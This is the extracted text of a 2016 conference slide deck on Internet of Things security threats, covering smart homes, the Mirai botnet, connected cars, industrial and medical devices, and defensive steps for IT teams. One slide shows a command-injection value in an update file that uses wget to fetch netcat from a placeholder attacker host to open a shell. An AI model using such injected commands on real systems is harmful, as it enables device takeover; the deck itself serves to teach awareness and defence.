The Internet of Threats BILLIONS OF WAYS THE IOT POSES AN INFOSEC CHALLENGE
Chris Poulin IoT Researcher, Futurist
CyberCrime 2016 Symposium: Cyber Convergence The easiest way to hack an Airbus A319
. Maker . Breaker . Threat intel . Data geek . Provocateur . TV & movies Some questions to establish context
What is your role wrt the IoT? • Personal consumer of the IoT • Enterprise manager of IT systems • A maker of IoT devices
What is your biggest concern with the IoT? • Safety (e.g., HVAC systems gone wild) • Data privacy • Infrastructure security (e.g., IT comingling with IoT) • New enterprise attack vectors (e.g., end users with wearables)
Smart Home Device Examples: Home Security
Security control and alarm panels Smart door locks Smart garage doors Motion detectors Window and door contacts Security cameras Smart doorbells Smart Fridge Smart Faucet
Smart Lighting
Smart Oven
Smart Dishwasher Smart Utensils Smart Television
Smart Wine Smart Home Device Examples: Appliances, Lighting, Entertainment
Appliances • Refrigerators and cooktops • Beds • Autonomous vacuums Lighting • Light bulbs (plain white and color changing) • Pathway lighting • Indoor and outdoor Entertainment • Smart televisions and DVRs • Audio systems Smart Home Device Examples: Environment & Safety
Smart thermostats Smoke / CO detectors Smart air conditioners
Smart blinds Water leak detectors Baby monitors Smart homes are vulnerable
“Buy V!gar4”
Your WiFi password is “fluffy123” Why does home automation matter to enterprise IT security? Mirai malware infected devices
Krebs 620-650 Gbps OVH ~1 Tbps Dyn Amazon, PayPal, Box, Slack, Twitter, GitHub, Netflix, Airbnb, Pinterest, Quora, Spotify, Yelp, Second Life, WWE Network Smart Lighting
Concrete Monitors
Smart Doors
Smart Elevators IIoT Device Examples: Building Automation
Electric & water HVAC Security systems Lighting Elevators and escalators Polarized windows Earthquake absorbers Concrete mixing & curing
And they will be connected to your IT networks
IT Network BAS Network Connected Infrastructure
Connected Cars IIoT Device Examples: Smart Cities & Municipalities
Utilities Lighting Traffic flow Trash Air quality Violence detection
Connected vehicle threat surface
Bluetooth, WiFi, media players Car Multimedia
OnStar, Uconnect, etc. Dynamic Stability Control
Instrument Cluster / Telematics Airbag Control Unit Transmission Control Unit Keyless Entry / Anti-theft
Engine Control Unit OBD-II Direct connection RF channel Anti-lock Braking System Vehicle to Vehicle / Vehicle to Infrastructure Communications Tire Pressure Monitor
RF channel DSRC RF IVIs are messy
Linux / Tizen / QNX
Audio module Apple CarPlay Telematics (open source?) module GPS module Video module Google Android (open source?) module WiFi module Voice module Microsoft Sync (open source?) module Update feature …so let’s break one
updates.txt somepkg ‘; wget http://evil.org/nc; nc …
Port 6667/TCP SPI
V850 CAN bus Number of latent vulnerabilities in a modern luxury vehicle Using the Linux kernel as a comparative model (as of 10 Oct 2016) 15M lines of code in Linux Kernel
1,507 reported vulnerabilities ~10,000 latent 1 vulnerability in vulnerabilities every 9,954 lines of code
Source: http://www.cvedetails.com/vulnerability-list/vendor_id-33/product_id-47/Linux-Linux-Kernel.html The perfect storm of resources & tools Build your own vehicle eBay, SparkFun, hacking lab & test cart etc.
Protocol decodes available
http://www.ioactive.com/pdfs/IOActive_Adventures_in_Automotive_Networks_and_Control_Units.pdf http://illmatics.com/car_hacking_poories.pdf http://marco.guardigli.it/2010/10/hacking-your-car.html http://opengarages.org/handbook/ IIoT Device Examples: Heavy Industries
Manufacturing: • Pumps • Conveyors • Robots
Energy & Utilities: • Smart meters • Transformers • Pumps • Dam gates
Industrial IoT incidents
German steel mill
Stuxnet Agricultural vulnerabilities
. Planters: seed depth . Sprayers: dosage manipulation . Silos: manipulate environment . Livestock: feeding, drug, and environmental systems manipulation . Milk: manipulate pasteurization and pH balancesystems . Hydroponics: manipulate environment . Irrigation: manipulate control and data . Seeds: manipulate environment . Slaughter: remote control—effect? Who knows… . Processing: manipulate waste system (reverse?) IIoT Device Examples: Consumer Services
Healthcare • X-ray machines • Chemistry analyzers • Pacemakers, insulin pumps
Retail • Inventory tracking • Stocking & picking • Shipping Healthcare: hacking a telesurgery unit Wearable device examples
Google Glass Android Wear Fitness Trackers Apple Watch
Insulin pumps
Pacemakers Subcutaneous vitals monitor Wearables security
Fitbit Bluetooth
Sync to PC
Malware: PC pwned!
Be Winston Wolfe. Solve problems.
“You’ve got a corpse in the car, minus a head. Take me to it.” The layers of the IoT
Traditional IT Services & Security IoT defense for IT security professionals (1 of 4)
1. Conduct an asset inventory • Focus on critical assets and sensitive data • NetFlow to passively identify assets • VA scans to actively identify assets and add context • RF scanning • GQRX • Scripting skilllz IoT defense for IT security professionals (2 of 4)
2. Segment systems based on risk
• Enclave firewalls
• Software defined networks
3. Monitor & defend IoT devices on the network
• IDS / IPS
• NetFlow—look for anomalies
• Map relationships of wearables to mobile to users IoT defense for IT security professionals (3 of 4)
4. Protect IT endpoints
• Endpoint protection software
• VA scanning / patching
• Phishing exercises
5. Collect logs and events from IoT devices
• Log management / SIEM IoT defense for IT security professionals (4 of 4)
6. Update security policies to include IoT devices
7. Familiarize yourself with non-IT connected devices Resources for makers
https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project http://builditsecure.ly/ https://www.iamthecavalry.org/